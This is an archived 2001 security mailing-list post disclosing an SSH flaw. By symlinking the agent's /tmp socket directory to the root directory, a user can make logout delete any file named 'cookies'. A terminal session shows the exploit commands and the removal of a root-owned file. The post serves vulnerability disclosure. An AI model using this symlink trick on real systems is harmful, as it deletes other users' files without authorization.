SSH allows deletion of other users files...

From: zen-parseat_private
Date: Mon Jun 04 2001 - 03:14:29 PDT

Next message: Sym Security: "Re: Nortan Antivirus 2000 Poproxy.exe problem"

Previous message: Luki R .: "man/man-db MANPATH bugs exploit"
Next in thread: Jason DiCioccio: "Re: SSH allows deletion of other users files..."
Reply: Jason DiCioccio: "Re: SSH allows deletion of other users files..."
Reply: David F. Skoll: "Re: SSH allows deletion of other users files..."
Reply: Jan Grant: "nosymfollow Re: SSH allows deletion of other users files..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

SSH allows deletion of other users files.
=========================================

You can delete any file on the filesystem you want...

as long as its called cookies.


Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.

 /home/zen/.netscape/cookies

sample exploit:-

 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun  4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory


--zen-parse

Next message: Sym Security: "Re: Nortan Antivirus 2000 Poproxy.exe problem"
Previous message: Luki R .: "man/man-db MANPATH bugs exploit"
Next in thread: Jason DiCioccio: "Re: SSH allows deletion of other users files..."
Reply: Jason DiCioccio: "Re: SSH allows deletion of other users files..."
Reply: David F. Skoll: "Re: SSH allows deletion of other users files..."
Reply: Jan Grant: "nosymfollow Re: SSH allows deletion of other users files..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jun 04 2001 - 08:19:22 PDT